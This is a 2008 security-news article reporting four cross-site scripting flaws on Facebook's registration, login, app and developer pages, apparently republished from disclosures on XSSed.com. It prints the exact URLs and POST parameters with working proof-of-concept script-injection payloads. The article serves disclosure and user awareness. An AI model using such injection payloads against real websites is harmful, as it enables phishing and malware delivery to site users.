CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts
December 15th, 2008

Four Cross-scripting Vulnerabilities Found on Facebook Pose Serious Privacy Risk

XSSed.com reported today four flaws affecting Facebook’s developers page, login page and the new users registration page, potentially assisting malicious attackers make their spam and phishing campaigns look authentic. Cybercriminals  could exploit these XSS flaws to infect Facebook users, both new and registered, with malware or spyware.

The flaws that affect Facebook components have already been reported. So far there were no known cases of active exploitation and Facebook is usually quick to react upon notification.

Latest Facebook XSS vulnerabilities as they are reported on XSSed:

XSS #1 with POST (by Zeitjak)

http://www.new.facebook.com/r.php

POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar

XSS #2 with POST (by David Wharton)

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C
%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle
%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo
%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

Facebook users are advised not to accept friend invitations from strangers, not to follow Facebook links sent by email from unknown sources and report suspicious requests to Facebook security staff.

Share this item with others:

More on CyberInsecure:
  • New Cross-Site Scripting Vulnerability Found On Facebook
  • Facebook Mobile API XSS Vulnerability Used To Launch Spam Worm
  • Facebook Urges Public Exposure In ‘Privacy’ Revision
  • Facebook Bug Allowed Chats To Be Eavesdropped
  • Vulnerabilities In Both Principal London Mayoral Election Candidates Websites

  • If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Four Cross-scripting Vulnerabilities Found on Facebook Pose Serious Privacy Risk

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    *
    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.